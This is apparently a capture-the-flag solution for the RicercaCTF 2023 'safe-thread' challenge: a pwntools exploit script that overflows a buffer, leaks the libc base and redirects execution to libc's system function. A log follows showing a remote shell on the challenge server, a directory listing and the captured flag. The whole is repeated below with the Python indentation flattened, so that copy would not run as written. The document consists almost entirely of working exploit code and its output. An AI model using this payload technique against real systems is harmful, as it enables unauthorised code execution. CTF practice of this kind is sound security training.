hama7230/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./chall')
context(os='linux', arch=elf.arch)
# context(log_level='debug')  # output verbose log

RHOST = "safe-thread.2023.ricercactf.com"
RPORT = 9004
LHOST = "127.0.0.1"
LPORT = 21700

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./chall'], gdbscript=gdbscript)
else:
    conn = process(['./chall'])
    # conn = process(['./lazyhouse'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

payload = str(0x2000 + 1) + '\n'
conn.sendafter("size:", payload)

payload = b'x'*0x7d8
payload += p64(0x403f82)
payload += p64(0) * 10
payload += p64(0xdeadbeef) * 2 + p64(0x404100) + p64(0xdeadbee) + p64(0) + p64(0xbadbeef)
payload += p64(0x4012c3)
conn.sendafter("data", payload + b'\n')

conn.recvuntil(b'\x00')
libc_base = u64(b'\x00'+conn.recv(7)) - 0x21af00
print("libc_base : " + hex(libc_base))

tcache_key = 0x4012c3
do_system = libc_base + 0x508f0 + 2
addr = ((do_system ^ tcache_key)<<0x11)&0xffffffffffff8000
addr += ((do_system ^ tcache_key)>>0x2f)&0x7fff
payload = p64(addr) + p64(libc_base + 0x1d8698) + p64(0) + p64(0)
payload = payload.ljust(0x870, b'z')
payload += p64(libc_base-0x4288)
conn.send(payload)

conn.interactive()

## log.txt
root@u22:~/safe-thread# python3 exp.py r
[*] '/root/safe-thread/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to safe-thread.2023.ricercactf.com on port 9004: Done
[*] Pwning
/root/safe-thread/exp.py:41: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  conn.sendafter("size:", payload)
/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
libc_base : 0x7f54198ac000
[*] Switching to interactive mode
 s\xac\x19\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xac\x19\x7f\x00\x04\xac\x19\x7f\x00\x04\xac\x19\x7f\x00$
$ ls
bin
boot
dev
etc
flag-b620074ecec0a4693a967174b8d8d4af.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag*
RicSec{pthread_1s_w34k_t0_BOF_by_d3s1gn}
$
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./chall')
	context(os='linux', arch=elf.arch)
	# context(log_level='debug') # output verbose log

	RHOST = "safe-thread.2023.ricercactf.com"
	RPORT = 9004
	LHOST = "127.0.0.1"
	LPORT = 21700

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./chall'], gdbscript=gdbscript)
	else:
	conn = process(['./chall'])
	# conn = process(['./lazyhouse'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')

	payload = str(0x2000 + 1) + '\n'
	conn.sendafter("size:", payload)

	payload = b'x'*0x7d8
	payload += p64(0x403f82)
	payload += p64(0) * 10
	payload += p64(0xdeadbeef) * 2 + p64(0x404100) + p64(0xdeadbee) + p64(0) + p64(0xbadbeef)
	payload += p64(0x4012c3)
	conn.sendafter("data", payload + b'\n')

	conn.recvuntil(b'\x00')
	libc_base = u64(b'\x00'+conn.recv(7)) - 0x21af00
	print("libc_base : " + hex(libc_base))

	tcache_key = 0x4012c3
	do_system = libc_base + 0x508f0 + 2
	addr = ((do_system ^ tcache_key)<<0x11)&0xffffffffffff8000
	addr += ((do_system ^ tcache_key)>>0x2f)&0x7fff
	payload = p64(addr) + p64(libc_base + 0x1d8698) + p64(0) + p64(0)
	payload = payload.ljust(0x870, b'z')
	payload += p64(libc_base-0x4288)
	conn.send(payload)

	conn.interactive()
	root@u22:~/safe-thread# python3 exp.py r
	[*] '/root/safe-thread/chall'
	Arch: amd64-64-little
	RELRO: Full RELRO
	Stack: No canary found
	NX: NX enabled
	PIE: No PIE (0x400000)
	[+] Opening connection to safe-thread.2023.ricercactf.com on port 9004: Done
	[*] Pwning
	/root/safe-thread/exp.py:41: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
	conn.sendafter("size:", payload)
	/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
	res = self.recvuntil(delim, timeout=timeout)
	libc_base : 0x7f54198ac000
	[*] Switching to interactive mode
	s\xac\x19\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xac\x19\x7f\x00\x04\xac\x19\x7f\x00\x04\xac\x19\x7f\x00$
	$ ls
	bin
	boot
	dev
	etc
	flag-b620074ecec0a4693a967174b8d8d4af.txt
	home
	lib
	lib32
	lib64
	libx32
	media
	mnt
	opt
	proc
	root
	run
	sbin
	srv
	sys
	tmp
	usr
	var
	$ cat flag*
	RicSec{pthread_1s_w34k_t0_BOF_by_d3s1gn}
	$